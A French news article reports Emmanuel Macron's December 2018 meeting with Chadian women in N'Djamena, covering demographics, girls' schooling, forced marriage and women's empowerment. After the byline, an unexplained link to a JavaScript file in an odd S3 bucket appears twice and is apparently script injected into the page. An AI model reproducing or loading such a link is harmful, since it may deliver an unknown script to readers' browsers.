LE PRÉSIDENT EMMANUEL MACRON, AUX CÔTÉS DES FEMMES TCHADIENNES

0
640

Arrivé au Tchad dans l’après-midi du 22 décembre, le Président français Emmanuel MACRON s’est entretenu ce 23 décembre 2018 avec les femmes tchadiennes dans la grande salle de la maison de la femme de N’Djamena.

Présidé par Madame le Ministre Mariam Mahamat Nour Secrétaire Générale du Gouvernement, chargée des relations avec l’Assemblée nationale, cet entretien a pour objectif d’écouter les femmes pour déceler les maux qui minent l’environnement féminin et de les secourir si possible dans leurs luttes et ambitions. En introduisant, Mme le Ministre Mariam Mahamat Nour a précisé au Président français, que le Tchad compte au total 51% des femmes et que c’est un honneur pour elle de le recevoir car selon elle, MACRON est le premier président français voire étranger de prêter son temps à écouter les tchadiennes lors d’une visite officielle au Tchad.

Stupéfait par l’affirmation des femmes, MACRON pense que si c’est la première fois, qu’un chef d’État vient échanger avec les femmes, c’est parce que, les présidents n’ont pas compris totalement ce qui est en train de se passer. Pour le Président français, partout en Afrique les femmes sont en train de prendre le pouvoir. Car, estime-t-il, que l’avenir de l’Afrique ne peut pas se construire sans la femme.

« C’est la sixième fois que je viens dans le sahel et la fois au Tchad. C’est vrai que le discours que j’ai tenu à Ouaga Dougou d’à peu près un an, j’ai mis justement l’autonomisation des femmes au cœur de cette politique stratégique. J’ai beaucoup choqué des gens au début de mon mandat surtout en Europe en parlant d’une boom démographique en Afrique. Il y a une boom démographique parce que le taux de natalité comme le vôtre n’est pas soutenable ». Le Président MACRON pense que, l’Afrique est en train de progresser à un rythme démographique inconsommable par ses propres économies. Il s’est aussi attardé sur la question de la déscolarisation des filles, le mariage forcé et le choix de vie imposé aux jeunes filles sans oublier la question de la parité, justice, culture, environnement, entrepreneuriat féminin, clivage social qu’il doit observer de près.

Voyant l’engagement des femmes tchadiennes, le Président dixit : « Je ne suis pas venu faire de grand discours mais je suis venu simplement vous dire que, je suis convaincu qu’un nouvel déclic de notre destin commence ». Sur ce, après avoir écouté tour à tour ces femmes, il a promis de veiller sur les préoccupations majeures de la femme tchadienne.

ADDE .G & KITA Ézéchiel

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Facebook Comments

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici